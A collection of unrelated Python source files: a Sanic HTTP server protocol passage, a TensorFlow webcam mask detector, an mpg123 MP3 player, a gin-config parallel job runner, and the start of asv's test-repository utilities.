await self.request.stream.put(body)
def on_message_complete(self):
# Entire request (headers and whole body) is received.
# We can cancel and remove the request timeout handler now.
if self._request_timeout_handler:
self._request_timeout_handler.cancel()
self._request_timeout_handler = None
if self.is_request_stream and self._is_stream_handler:
self._request_stream_task = self.loop.create_task(
self.request.stream.put(None)
)
return
self.request.body_finish()
self.execute_request_handler()
def execute_request_handler(self):
"""
Invoke the request handler defined by the
:func:`sanic.app.Sanic.handle_request` method
:return: None
"""
self._response_timeout_handler = self.loop.call_later(
self.response_timeout, self.response_timeout_callback
)
self._last_request_time = time()
self._request_handler_task = self.loop.create_task(
self.request_handler(
self.request, self.write_response, self.stream_response
)
)
# -------------------------------------------- #
# Responding
# -------------------------------------------- #
def log_response(self, response):
"""
Helper method provided to enable the logging of responses in case if
the :attr:`HttpProtocol.access_log` is enabled.
:param response: Response generated for the current request
:type response: :class:`sanic.response.HTTPResponse` or
:class:`sanic.response.StreamingHTTPResponse`
:return: None
"""
if self.access_log:
extra = {"status": getattr(response, "status", 0)}
if isinstance(response, HTTPResponse):
extra["byte"] = len(response.body)
else:
extra["byte"] = -1
extra["host"] = "UNKNOWN"
if self.request is not None:
if self.request.ip:
extra["host"] = "{0}:{1}".format(
self.request.ip, self.request.port
)
extra["request"] = "{0} {1}".format(
self.request.method, self.request.url
)
else:
extra["request"] = "nil"
access_logger.info("", extra=extra)
def write_response(self, response):
"""
Writes response content synchronously to the transport.
"""
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
self._response_timeout_handler = None
try:
keep_alive = self.keep_alive
self.transport.write(
response.output(
self.request.version, keep_alive, self.keep_alive_timeout
)
)
self.log_response(response)
except AttributeError:
logger.error(
"Invalid response object for url %s, "
"Expected Type: HTTPResponse, Actual Type: %s",
self.url,
type(response),
)
self.write_error(ServerError("Invalid response type"))
except RuntimeError:
if self._debug:
logger.error(
"Connection lost before response written @ %s",
self.request.ip,
)
keep_alive = False
except Exception as e:
self.bail_out(
"Writing response failed, connection closed {}".format(repr(e))
)
finally:
if not keep_alive:
self.transport.close()
self.transport = None
else:
self._keep_alive_timeout_handler = self.loop.call_later(
self.keep_alive_timeout, self.keep_alive_timeout_callback
)
self._last_response_time = time()
self.cleanup()
async def drain(self):
await self._not_paused.wait()
def push_data(self, data):
self.transport.write(data)
async def stream_response(self, response):
"""
Streams a response to the client asynchronously. Attaches
the transport to the response so the response consumer can
write to the response as needed.
"""
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
self._response_timeout_handler = None
try:
keep_alive = self.keep_alive
response.protocol = self
await response.stream(
self.request.version, keep_alive, self.keep_alive_timeout
)
self.log_response(response)
except AttributeError:
logger.error(
"Invalid response object for url %s, "
"Expected Type: HTTPResponse, Actual Type: %s",
self.url,
type(response),
)
self.write_error(ServerError("Invalid response type"))
except RuntimeError:
if self._debug:
logger.error(
"Connection lost before response written @ %s",
self.request.ip,
)
keep_alive = False
except Exception as e:
self.bail_out(
"Writing response failed, connection closed {}".format(repr(e))
)
finally:
if not keep_alive:
self.transport.close()
self.transport = None
else:
self._keep_alive_timeout_handler = self.loop.call_later(
self.keep_alive_timeout, self.keep_alive_timeout_callback
)
self._last_response_time = time()
self.cleanup()
def write_error(self, exception):
# An error _is_ a response.
# Don't throw a response timeout, when a response _is_ given.
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
self._response_timeout_handler = None
response = None
try:
response = self.error_handler.response(self.request, exception)
version = self.request.version if self.request else "1.1"
self.transport.write(response.output(version))
except RuntimeError:
if self._debug:
logger.error(
"Connection lost before error written @ %s",
self.request.ip if self.request else "Unknown",
)
except Exception as e:
self.bail_out(
"Writing error failed, connection closed {}".format(repr(e)),
from_error=True,
)
finally:
if self.parser and (
self.keep_alive or getattr(response, "status", 0) == 408
):
self.log_response(response)
try:
self.transport.close()
except AttributeError:
logger.debug("Connection lost before server could close it.")
def bail_out(self, message, from_error=False):
"""
In case if the transport pipes are closed and the sanic app encounters
an error while writing data to the transport pipe, we log the error
with proper details.
:param message: Error message to display
:param from_error: If the bail out was invoked while handling an
exception scenario.
:type message: str
:type from_error: bool
:return: None
"""
if from_error or self.transport.is_closing():
logger.error(
"Transport closed @ %s and exception "
"experienced during error handling",
self.transport.get_extra_info("peername"),
)
logger.debug("Exception:", exc_info=True)
else:
self.write_error(ServerError(message))
logger.error(message)
def cleanup(self):
"""This is called when KeepAlive feature is used,
it resets the connection in order for it to be able
to handle receiving another request on the same connection."""
self.parser = None
self.request = None
self.url = None
self.headers = None
self._request_handler_task = None
self._request_stream_task = None
self._total_request_size = 0
self._is_stream_handler = False
def close_if_idle(self):
"""Close the connection if a request is not being sent or received
:return: boolean - True if closed, false if staying open
"""
if not self.parser:
self.transport.close()
return True
return False
def close(self):
"""
Force close the connection.
"""
if self.transport is not None:
self.transport.close()
self.transport = None
def trigger_events(events, loop):
"""Trigger event callbacks (functions or async)
:param events: one or more sync or async functions to execute
:param loop: event loop
"""
for event in events:
result = event(loop)
if isawaitable(result):
loop.run_until_complete(result)
def serve(
host,
port,
request_handler,
error_handler,
before_start=None,
after_start=None,
before_stop=None,
after_stop=None,
debug=False,
request_timeout=60,
response_timeout=60,
keep_alive_timeout=5,
ssl=None,
sock=None,
request_max_size=None,
request_buffer_queue_size=100,
reuse_port=False,
loop=None,
protocol=HttpProtocol,
backlog=100,
register_sys_signals=True,
run_multiple=False,
run_async=False,
connections=None,
signal=Signal(),
request_class=None,
access_log=True,
keep_alive=True,
is_request_stream=False,
router=None,
websocket_max_size=None,
websocket_max_queue=None,
websocket_read_limit=2 ** 16,
websocket_write_limit=2 ** 16,
state=None,
graceful_shutdown_timeout=15.0,
asyncio_server_kwargs=None,
):
"""Start asynchronous HTTP Server on an individual process.
:param host: Address to host on
:param port: Port to host on
:param request_handler: Sanic request handler with middleware
:param error_handler: Sanic error handler with middleware
:param before_start: function to be executed before the server starts
listening. Takes arguments `app` instance and `loop`
:param after_start: function to be executed after the server starts
listening. Takes arguments `app` instance and `loop`
:param before_stop: function to be executed when a stop signal is
received before it is respected. Takes arguments
`app` instance and `loop`
:param after_stop: function to be executed when a stop signal is
received after it is respected. Takes arguments
`app` instance and `loop`
:param debug: enables debug output (slows server)
:param request_timeout: time in seconds
:param response_timeout: time in seconds
:param keep_alive_timeout: time in seconds
:param ssl: SSLContext
:param sock: Socket for the server to accept connections from
:param request_max_size: size in bytes, `None` for no limit
:param reuse_port: `True` for multiple workers
:param loop: asyncio compatible event loop
:param protocol: subclass of asyncio protocol class
:param request_class: Request class to use
:param access_log: disable/enable access log
:param websocket_max_size: enforces the maximum size for
incoming messages in bytes.
:param websocket_max_queue: sets the maximum length of the queue
that holds incoming messages.
:param websocket_read_limit: sets the high-water limit of the buffer for
incoming bytes, the low-water limit is half
the high-water limit.
:param websocket_write_limit: sets the high-water limit of the buffer for
outgoing bytes, the low-water limit is a
quarter of the high-water limit.
:param is_request_stream: disable/enable Request.stream
:param request_buffer_queue_size: streaming request buffer queue size
:param router: Router object
:param graceful_shutdown_timeout: How long take to Force close non-idle
connection
:param asyncio_server_kwargs: key-value args for asyncio/uvloop
create_server method
:return: Nothing
"""
if not run_async:
# create new event_loop after fork
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
if debug:
loop.set_debug(debug)
connections = connections if connections is not None else set()
server = partial(
protocol,
loop=loop,
connections=connections,
signal=signal,
request_handler=request_handler,
error_handler=error_handler,
request_timeout=request_timeout,
response_timeout=response_timeout,
keep_alive_timeout=keep_alive_timeout,
request_max_size=request_max_size,
request_class=request_class,
access_log=access_log,
keep_alive=keep_alive,
is_request_stream=is_request_stream,
router=router,
websocket_max_size=websocket_max_size,
websocket_max_queue=websocket_max_queue,
websocket_read_limit=websocket_read_limit,
websocket_write_limit=websocket_write_limit,
state=state,
debug=debug,
)
asyncio_server_kwargs = (
asyncio_server_kwargs if asyncio_server_kwargs else {}
)
server_coroutine = loop.create_server(
server,
host,
port,
ssl=ssl,
reuse_port=reuse_port,
sock=sock,
backlog=backlog,
**asyncio_server_kwargs
)
if run_async:
return server_coroutine
trigger_events(before_start, loop)
try:
http_server = loop.run_until_complete(server_coroutine)
except BaseException:
logger.exception("Unable to start server")
return
trigger_events(after_start, loop)
# Ignore SIGINT when run_multiple
if run_multiple:
signal_func(SIGINT, SIG_IGN)
# Register signals for graceful termination
if register_sys_signals:
_singals = (SIGTERM,) if run_multiple else (SIGINT, SIGTERM)
for _signal in _singals:
try:
loop.add_signal_handler(_signal, loop.stop)
except NotImplementedError:
logger.warning(
"Sanic tried to use loop.add_signal_handler "
"but it is not implemented on this platform."
)
pid = os.getpid()
try:
logger.info("Starting worker [%s]", pid)
loop.run_forever()
finally:
logger.info("Stopping worker [%s]", pid)
# Run the on_stop function if provided
trigger_events(before_stop, loop)
# Wait for event loop to finish and all connections to drain
http_server.close()
loop.run_until_complete(http_server.wait_closed())
# Complete all tasks on the loop
signal.stopped = True
for connection in connections:
connection.close_if_idle()
# Gracefully shutdown timeout.
# We should provide graceful_shutdown_timeout,
# instead of letting connection hangs forever.
# Let's roughly calcucate time.
start_shutdown = 0
while connections and (start_shutdown < graceful_shutdown_timeout):
loop.run_until_complete(asyncio.sleep(0.1))
start_shutdown = start_shutdown + 0.1
# Force close non-idle connection after waiting for
# graceful_shutdown_timeout
coros = []
for conn in connections:
if hasattr(conn, "websocket") and conn.websocket:
coros.append(conn.websocket.close_connection())
else:
conn.close()
_shutdown = asyncio.gather(*coros, loop=loop)
loop.run_until_complete(_shutdown)
trigger_events(after_stop, loop)
loop.close()
def serve_multiple(server_settings, workers):
"""Start multiple server processes simultaneously. Stop on interrupt
and terminate signals, and drain connections when complete.
:param server_settings: kw arguments to be passed to the serve function
:param workers: number of workers to launch
:param stop_event: if provided, is used as a stop signal
:return:
"""
server_settings["reuse_port"] = True
server_settings["run_multiple"] = True
# Handling when custom socket is not provided.
if server_settings.get("sock") is None:
sock = socket()
sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sock.bind((server_settings["host"], server_settings["port"]))
sock.set_inheritable(True)
server_settings["sock"] = sock
server_settings["host"] = None
server_settings["port"] = None
def sig_handler(signal, frame):
logger.info("Received signal %s. Shutting down.", Signals(signal).name)
for process in processes:
os.kill(process.pid, SIGTERM)
signal_func(SIGINT, lambda s, f: sig_handler(s, f))
signal_func(SIGTERM, lambda s, f: sig_handler(s, f))
processes = []
for _ in range(workers):
process = Process(target=serve, kwargs=server_settings)
process.daemon = True
process.start()
processes.append(process)
for process in processes:
process.join()
# the above processes will block this until they're stopped
for process in processes:
process.terminate()
server_settings.get("sock").close()
|
mask_detect_live_cam.py
|
import numpy as np
import os
import six.moves.urllib as urllib
import sys
import tarfile
import tensorflow as tf
import zipfile
import cv2
import time
from threading import Thread
import importlib.util
from collections import defaultdict
from io import StringIO
from matplotlib import pyplot as plt
from PIL import Image
from object_detection.utils import label_map_util
from object_detection.utils import visualization_utils as vis_util
# Define the video stream
class VideoStream:
def __init__(self,resolution=(640,480),framerate=30):
# Initialize the PiCamera and the camera image stream
self.stream = cv2.VideoCapture(0)
ret = self.stream.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter_fourcc(*'MJPG'))
ret = self.stream.set(3,resolution[0])
ret = self.stream.set(4,resolution[1])
# Read first frame from the stream
(self.grabbed, self.frame) = self.stream.read()
# Variable to control when the camera is stopped
self.stopped = False
def start(self):
# Start the thread that reads frames from the video stream
Thread(target=self.update,args=()).start()
return self
def update(self):
# Keep looping indefinitely until the thread is stopped
while True:
# If the camera is stopped, stop the thread
if self.stopped:
# Close camera resources
self.stream.release()
return
# Otherwise, grab the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# Return the most recent frame
return self.frame
def stop(self):
# Indicate that the camera and thread should be stopped
self.stopped = True
cap = cv2.VideoCapture(0) # Change only if you have more than one webcams
# Path to frozen detection graph. This is the actual model that is used for the object detection.
PATH_TO_CKPT = 'research/ssdlite_saved_model-150k/frozen_inference_graph.pb'
# List of the strings that is used to add correct label for each box.
PATH_TO_LABELS = 'research/training/labelmap.pbtxt'
# Number of classes to d etect
NUM_CLASSES = 3
min_conf_threshold = float(0.95)
resW, resH = 1280, 720
imW, imH = int(resW), int(resH)
color_box = [(0,255,0), (0,0,255), (0,255,255)]
# Load a (frozen) Tensorflow model into memory.
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.compat.v1.GraphDef()
with tf.io.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
# Loading label map
# Label maps map indices to category names, so that when our convolution network predicts `5`, we know that this corresponds to `airplane`. Here we use internal utility functions, but anything that returns a dictionary mapping integers to appropriate string labels would be fine
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES, use_display_name=True)
category_index = label_map_util.create_category_index(categories)
print(category_index)
# Initialize frame rate calculation
frame_rate_calc = 1
freq = cv2.getTickFrequency()
# Initialize video stream
videostream = VideoStream(resolution=(imW,imH),framerate=30).start()
time.sleep(1)
# Detection
with detection_graph.as_default():
with tf.compat.v1.Session(graph=detection_graph) as sess:
while True:
# Read frame from camera
t1 = cv2.getTickCount()
# Grab frame from video stream
frame1 = videostream.read()
# Acquire frame and resize to expected shape [1xHxWx3]
frame = frame1.copy()
frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
frame_resized = cv2.resize(frame_rgb, (imW, imH))
image_np_expanded = np.expand_dims(frame_resized, axis=0)
# Extract image tensor
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Extract detection boxes
boxes = detection_graph.get_tensor_by_name('detection_boxes:0')
# Extract detection scores
scores = detection_graph.get_tensor_by_name('detection_scores:0')
# Extract detection classes
classes = detection_graph.get_tensor_by_name('detection_classes:0')
# Extract number of detectionsd
num_detections = detection_graph.get_tensor_by_name(
'num_detections:0')
# Actual detection.
(boxes, scores, classes, num_detections) = sess.run(
[boxes, scores, classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
boxes = np.squeeze(boxes)
classes = np.squeeze(classes).astype(np.int32)
scores = np.squeeze(scores)
for i in range(len(scores)):
if ((scores[i] > min_conf_threshold) and (scores[i] <= 1.0)):
ymin = int(max(1,(boxes[i][0] * imH)))
xmin = int(max(1,(boxes[i][1] * imW)))
ymax = int(min(imH,(boxes[i][2] * imH)))
xmax = int(min(imW,(boxes[i][3] * imW)))
cl = int(classes[i])
cv2.rectangle(frame, (xmin,ymin), (xmax,ymax), color_box[cl-1], 2)
# Draw label
object_name = category_index[classes[i]]['name']
#labels[int(classes[i])] # Look up object name from "labels" array using class index
label = '%s: %d%%' % (object_name, int(scores[i]*100))
labelSize, baseLine = cv2.getTextSize(label, cv2.FONT_HERSHEY_SIMPLEX, 0.7, 2) # Get font size
label_ymin = max(ymin, labelSize[1] + 10) # Make sure not to draw label too close to top of window
cv2.rectangle(frame, (xmin, label_ymin-labelSize[1]-10), (xmin+labelSize[0], label_ymin+baseLine-10), (255, 255, 255), cv2.FILLED) # Draw white box to put label text in
cv2.putText(frame, label, (xmin, label_ymin-7), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 0), 2) # Draw label text
# Draw framerate in corner of frame
cv2.putText(frame,'FPS: {0:.2f}'.format(frame_rate_calc),(30,50),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,0),2,cv2.LINE_AA)
# Display output
cv2.imshow('Object detector - frozen_inference_graph.pb', frame)
# Calculate framerate
t2 = cv2.getTickCount()
time1 = (t2-t1)/freq
frame_rate_calc= 1/time1
if cv2.waitKey(25) & 0xFF == ord('q'):
cv2.destroyAllWindows()
break
|
mp3player.py
|
#!/usr/bin/env python
import ctypes
from enum import Enum
import threading
import queue
from queue import Empty
import mpg123
import logging
import random
from ctypes.util import find_library
logger = logging.getLogger(__name__)
class mpg123_frameinfo(ctypes.Structure):
_fields_ = [
('version', ctypes.c_ubyte),
('layer', ctypes.c_int),
('rate', ctypes.c_long),
('mode', ctypes.c_ubyte),
('mode_ext', ctypes.c_int),
('framesize', ctypes.c_int),
('flags', ctypes.c_ubyte),
('emphasis', ctypes.c_int),
('bitrate', ctypes.c_int),
('abr_rate', ctypes.c_int),
('vbr', ctypes.c_ubyte)
]
class ExtMpg123(mpg123.Mpg123):
SEEK_SET = 0
SEEK_CURRENT = 1
SEEK_END = 2
def __init__(self, filename=None, library_path=None):
if not library_path:
library_path = find_library('mpg123')
if not library_path:
library_path = find_library('libmpg123-0')
if not library_path:
raise self.LibInitializationException('libmpg123 not found.')
super().__init__(filename, library_path)
def open(self, filename):
errcode = self._lib.mpg123_open(self.handle, filename.encode())
if errcode != mpg123.OK:
raise self.OpenFileException(self.plain_strerror(errcode))
def timeframe(self, tsec):
t = ctypes.c_double(tsec)
errcode = self._lib.mpg123_timeframe(self.handle, t)
if errcode >= mpg123.OK:
return errcode
else:
raise self.LengthException(self.plain_strerror(errcode))
def seek_frame(self, pos, whence=SEEK_SET):
px = ctypes.c_long(pos)
errcode = self._lib.mpg123_seek_frame(self.handle, px, whence)
if errcode >= mpg123.OK:
return errcode
else:
raise self.LengthException(self.plain_strerror(errcode))
def tellframe(self):
errcode = self._lib.mpg123_tellframe(self.handle)
if errcode >= mpg123.OK:
return errcode
else:
raise self.LengthException(self.plain_strerror(errcode))
def info(self):
px = mpg123_frameinfo()
errcode = self._lib.mpg123_info(self.handle, ctypes.pointer(px))
if errcode != mpg123.OK:
raise self.ID3Exception(self.plain_strerror(errcode))
return px
_samples_per_frame = [
# version 1, layers 1,2,3
[384, 1152, 1152],
# version 2, layers 1,2,3
[384, 1152, 576],
# version 2.5, layers 1,2,3
[384, 1152, 576]
]
def frame_seconds(self, frame):
info = self.info()
return ExtMpg123._samples_per_frame[info.version][info.layer - 1] * frame / info.rate
class ExtOut123(mpg123.Out123):
def __init__(self, library_path=None):
super().__init__(library_path)
def pause(self):
self._lib.out123_pause(self.handle)
def resume(self):
self._lib.out123_continue(self.handle)
def stop(self):
self._lib.out123_stop(self.handle)
class PlayerState(Enum):
UNINITALISED = 0
INITALISED = 1, # Drivers loaded
LOADED = 2, # MP3 loaded of x seconds
READY = 3, # Ready to play a time x
PLAYING = 4, # Playing a file at time x
PAUSED = 5, # Paused at time x
FINISHED = 6, # Finished
PLAYLIST = 7 #Playing a playlist
class Player:
class Command(Enum):
LOAD = 1,
PLAY = 2,
PAUSE = 3,
PLAYLIST = 4,
SEEK = 5
class IllegalStateException(Exception):
pass
def __init__(self):
self.mp3 = ExtMpg123()
self.out = ExtOut123()
self.command_queue = queue.Queue(maxsize=1)
self.event_queue = queue.Queue()
self.playlist_queue = queue.Queue()
self._current_state = PlayerState.INITALISED
self.event_queue.put((self._current_state, None))
threading.Thread(target=self._run_player, daemon=True, name="Player").start()
def _run_player(self):
while True:
command = self.command_queue.get(block=True, timeout=None)
if command[0] == Player.Command.LOAD:
if self._current_state in [PlayerState.PLAYING]:
self.out.pause()
self.mp3.open(command[1])
tf = self.mp3.frame_length()
self.track_length = self.mp3.frame_seconds(tf)
self.frames_per_second = tf // self.track_length
self.update_per_frame_count = round(self.frames_per_second / 5)
self.to_time = self.track_length
self._set_state(PlayerState.LOADED, self.track_length)
self._set_state(PlayerState.READY, 0)
elif command[0] == Player.Command.PLAY:
if command[1] is not None:
tf = self.mp3.timeframe(command[1])
self.mp3.seek_frame(tf)
self.to_time = self.track_length if command[2] is None else command[2]
if self._current_state in [PlayerState.READY, PlayerState.PLAYING]:
self._play()
elif self._current_state in [PlayerState.PAUSED]:
self.out.resume()
self._play()
elif command[0] == Player.Command.PAUSE:
self.out.pause()
current_frame = self.mp3.tellframe()
current_time = self.mp3.frame_seconds(current_frame)
self._set_state(PlayerState.PAUSED, current_time)
elif command[0] == Player.Command.SEEK:
if self._current_state in \
[PlayerState.READY, PlayerState.PLAYING, PlayerState.PAUSED, PlayerState.FINISHED]:
tf = self.mp3.timeframe(command[1])
self.mp3.seek_frame(tf)
if self._current_state == PlayerState.FINISHED:
self._set_state(PlayerState.PAUSED, command[1])
else:
self.event_queue.put((self._current_state, command[1]))
if self._current_state in [PlayerState.PLAYING]:
self._play()
elif command[0] == Player.Command.PLAYLIST:
if self._current_state in [PlayerState.PLAYING]:
self.out.pause()
for song in command[1]:
self.playlist_queue.put(song)
self._set_state(PlayerState.PLAYLIST)
self._play_playlist()
else:
# what happened?
pass
def _play_playlist(self):
while True:
try:
song_mp3 = self.playlist_queue.get(block=False)
self.mp3.open(song_mp3)
tf = self.mp3.frame_length()
self.track_length = self.mp3.frame_seconds(tf)
self.frames_per_second = tf // self.track_length
self.update_per_frame_count = round(self.frames_per_second / 5)
self.to_time = self.track_length
fc = self.mp3.tellframe()
current_time = self.mp3.frame_seconds(fc)
self._set_state(PlayerState.PLAYING, current_time)
to_frame = self.mp3.timeframe(self.to_time) + 1
for frame in self.mp3.iter_frames(self.out.start):
self.out.play(frame)
fc += 1
if fc > to_frame:
current_time = self.mp3.frame_seconds(self.mp3.tellframe())
self._set_state(PlayerState.PAUSED, current_time)
return
if fc % self.update_per_frame_count == 0:
current_time = self.mp3.frame_seconds(self.mp3.tellframe())
self.event_queue.put((PlayerState.PLAYING, current_time))
if not self.command_queue.empty():
return
except Empty:
break
self._set_state(PlayerState.FINISHED)
def _play(self):
fc = self.mp3.tellframe()
current_time = self.mp3.frame_seconds(fc)
self._set_state(PlayerState.PLAYING, current_time)
to_frame = self.mp3.timeframe(self.to_time) + 1
for frame in self.mp3.iter_frames(self.out.start):
self.out.play(frame)
fc += 1
if fc > to_frame:
current_time = self.mp3.frame_seconds(self.mp3.tellframe())
self._set_state(PlayerState.PAUSED, current_time)
return
if fc % self.update_per_frame_count == 0:
current_time = self.mp3.frame_seconds(self.mp3.tellframe())
self.event_queue.put((PlayerState.PLAYING, current_time))
if not self.command_queue.empty():
return
self._set_state(PlayerState.FINISHED)
def _set_state(self, state, param=None):
self._current_state = state
self.event_queue.put((state, param))
def open(self, filename):
self.command_queue.put((Player.Command.LOAD, filename))
def pause(self):
self.command_queue.put((Player.Command.PAUSE, None))
def play(self, from_time=None, to_time=None):
self.command_queue.put((Player.Command.PLAY, from_time, to_time))
def seek(self, tsec):
self.command_queue.put((Player.Command.SEEK, tsec))
def playlist(self, filename_list):
self.command_queue.put((Player.Command.PLAYLIST, filename_list))
|
local_parallel.py
|
import curses
import subprocess
import threading
import itertools
from gin.config_parser import ConfigParser, BindingStatement
class GinParser:
def __init__(self, file):
self.parser = ConfigParser(file, None)
lines = [line for line in self.parser]
self.combinations = [self.get_combination_len(line) for line in lines]
self.lines = [line if combs > 1 else line.location.line_content.strip() for line, combs in
zip(lines, self.combinations)]
def __iter__(self):
self._iter = itertools.product(*[range(x) for x in self.combinations])
return self
def __next__(self):
ret = []
for line, i in zip(self.lines, next(self._iter)):
if isinstance(line, BindingStatement):
ret.append('/'.join(
x for x in (line.scope, '.'.join(y for y in (line.selector, line.arg_name) if y != '')) if
x != '') + '=' + str(line.value[i]))
else:
ret.append(line)
return '\n'.join(ret)
@staticmethod
def get_combination_len(line):
if isinstance(line, BindingStatement) and isinstance(line.value,
list) and not line.location.line_content.strip().endswith(
"skip"):
return len(line.value)
return 1
def gin_config_from_dict(params: dict):
return '\n'.join(str(x) + "=" + str(y) for x, y in params.items())
def create_local_job(py_file, gin_params) -> subprocess.Popen:
return subprocess.Popen(['/home/p/miniconda3/envs/workspace/bin/python', py_file], env={
"GIN_CONFIG": gin_config_from_dict(gin_params) if isinstance(gin_params, dict) else str(gin_params)},
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
def parse_and_run(py_file, gin_file):
with open(gin_file) as f:
processes = [create_local_job(py_file, conf) for i, conf in enumerate(GinParser(f))]
latest_logs = ["" for _ in processes]
def stream_pod_logs(logs_list: [str], index: int):
for line in iter(processes[index].stdout.readline, ''):
logs_list[index] = line
threads = [threading.Thread(target=stream_pod_logs, args=(latest_logs, i), daemon=True) for
i, pod in enumerate(processes)]
any(t.start() for t in threads)
def print_logs_in_curses(stdscr):
stdscr.nodelay(1) # 0.1 second
inp = -1
while any(t.is_alive() for t in threads):
stdscr.erase()
if inp == -1:
stdscr.addstr(0, 0, "Press e to exit")
elif inp == ord('e'):
break
else:
stdscr.addstr(0, 0, "unknown command")
for i, log in enumerate(latest_logs):
stdscr.addstr(i + 1, 0,
log) # carriage returns mess up the output
# f'proc{i}' + ' | ' + log[log.rfind("\r") + 1:]) # carriage returns mess up the output
stdscr.refresh()
inp = stdscr.getch()
curses.wrapper(print_logs_in_curses)
if __name__ == '__main__':
parse_and_run('train.py', 'test.gin')
|
tools.py
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, unicode_literals, print_function
"""
This file contains utilities to generate test repositories.
"""
import datetime
import io
import os
import threading
import time
import six
import tempfile
import textwrap
import sys
import shutil
import subprocess
from os.path import abspath, join, dirname, relpath, isdir
from contextlib import contextmanager
from hashlib import sha256
from six.moves import SimpleHTTPServer
import pytest
try:
import hglib
except ImportError as exc:
hglib = None
import asv
from asv import util
from asv import commands
from asv import config
from asv import runner
from asv.commands.preview import create_httpd
from asv.repo import get_repo
from asv.results import Results
from asv.plugins.conda import _find_conda
# Two Python versions for testing
PYTHON_VER1 = "{0[0]}.{0[1]}".format(sys.version_info)
if sys.version_info < (3,):
PYTHON_VER2 = "3.6"
else:
PYTHON_VER2 = "2.7"
# Installable library versions to use in tests
DUMMY1_VERSION = "0.14"
DUMMY2_VERSIONS = ["0.3.7", "0.3.9"]
WIN = (os.name == "nt")
try:
util.which('pypy')
HAS_PYPY = True
except (RuntimeError, IOError):
HAS_PYPY = hasattr(sys, 'pypy_version_info') and (sys.version_info[:2] == (2, 7))
try:
# Conda can install required Python versions on demand
_find_conda()
HAS_CONDA = True
except (RuntimeError, IOError):
HAS_CONDA = False
try:
import virtualenv
HAS_VIRTUALENV = True
except ImportError:
HAS_VIRTUALENV = False
try:
util.which('python{}'.format(PYTHON_VER2))
HAS_PYTHON_VER2 = True
except (RuntimeError, IOError):
HAS_PYTHON_VER2 = False
try:
import selenium
from selenium.common.exceptions import TimeoutException
HAVE_WEBDRIVER = True
except ImportError:
HAVE_WEBDRIVER = False
WAIT_TIME = 20.0
class DummyLock(object):
def __init__(self, filename):
pass
def acquire(self, timeout=None):
pass
def release(self):
pass
try:
from lockfile import LockFile
except ImportError:
LockFile = DummyLock
@contextmanager
def locked_cache_dir(config, cache_key, timeout=900, tag=None):
if LockFile is DummyLock:
cache_key = cache_key + os.environ.get('PYTEST_XDIST_WORKER', '')
base_dir = config.cache.makedir(cache_key)
lockfile = join(six.text_type(base_dir), 'lock')
cache_dir = join(six.text_type(base_dir), 'cache')
lock = LockFile(lockfile)
lock.acquire(timeout=timeout)
try:
# Clear cache dir contents if it was generated with different
# asv version
tag_fn = join(six.text_type(base_dir), 'tag.json')
tag_content = [asv.__version__, repr(tag)]
if os.path.isdir(cache_dir):
try:
if util.load_json(tag_fn) != tag_content:
raise ValueError()
except (IOError, ValueError, util.UserError):
shutil.rmtree(cache_dir)
if not os.path.isdir(cache_dir):
os.makedirs(cache_dir)
yield cache_dir
util.write_json(tag_fn, tag_content)
finally:
lock.release()
def run_asv(*argv, **kwargs):
parser, subparsers = commands.make_argparser()
args = parser.parse_args(argv)
return args.func(args, **kwargs)
def run_asv_with_conf(conf, *argv, **kwargs):
assert isinstance(conf, config.Config)
parser, subparsers = commands.make_argparser()
args = parser.parse_args(argv)
if sys.version_info[0] >= 3:
cls = args.func.__self__
else:
cls = args.func.im_self
return cls.run_from_conf_args(conf, args, **kwargs)
# These classes are defined here, rather than using asv/plugins/git.py
# and asv/plugins/mercurial.py since here we need to perform write
# operations to the repository, and the others should be read-only for
# safety.
class Git(object):
def __init__(self, path):
self.path = abspath(path)
self._git = util.which('git')
self._fake_date = datetime.datetime.now()
def run_git(self, args, chdir=True, **kwargs):
if chdir:
cwd = self.path
else:
cwd = None
kwargs['cwd'] = cwd
return util.check_output(
[self._git] + args, **kwargs)
def init(self):
self.run_git(['init'])
self.run_git(['config', 'user.email', 'robot@asv'])
self.run_git(['config', 'user.name', 'Robotic Swallow'])
def commit(self, message, date=None):
if date is None:
self._fake_date += datetime.timedelta(seconds=1)
date = self._fake_date
self.run_git(['commit', '--date', date.isoformat(),
'-m', message])
def tag(self, number):
self.run_git(['tag', '-a', '-m', 'Tag {0}'.format(number),
'tag{0}'.format(number)])
def add(self, filename):
self.run_git(['add', relpath(filename, self.path)])
def checkout(self, branch_name, start_commit=None):
args = ["checkout"]
if start_commit is not None:
args.extend(["-b", branch_name, start_commit])
else:
args.append(branch_name)
self.run_git(args)
def merge(self, branch_name, commit_message=None):
self.run_git(["merge", "--no-ff", "--no-commit", "-X", "theirs", branch_name])
if commit_message is None:
commit_message = "Merge {0}".format(branch_name)
self.commit(commit_message)
def get_hash(self, name):
return self.run_git(['rev-parse', name]).strip()
def get_branch_hashes(self, branch=None):
if branch is None:
branch = "master"
return [x.strip() for x in self.run_git(['rev-list', branch]).splitlines()
if x.strip()]
def get_commit_message(self, commit_hash):
return self.run_git(["log", "-n", "1", "--format=%s", commit_hash]).strip()
_hg_config = """
[ui]
username = Robotic Swallow <robot@asv>
"""
class Hg(object):
encoding = 'utf-8'
def __init__(self, path):
self._fake_date = datetime.datetime.now()
self.path = abspath(path)
self._repo = None
def __del__(self):
if self._repo is not None:
self._repo.close()
self._repo = None
def init(self):
hglib.init(self.path)
with io.open(join(self.path, '.hg', 'hgrc'), 'w', encoding="utf-8") as fd:
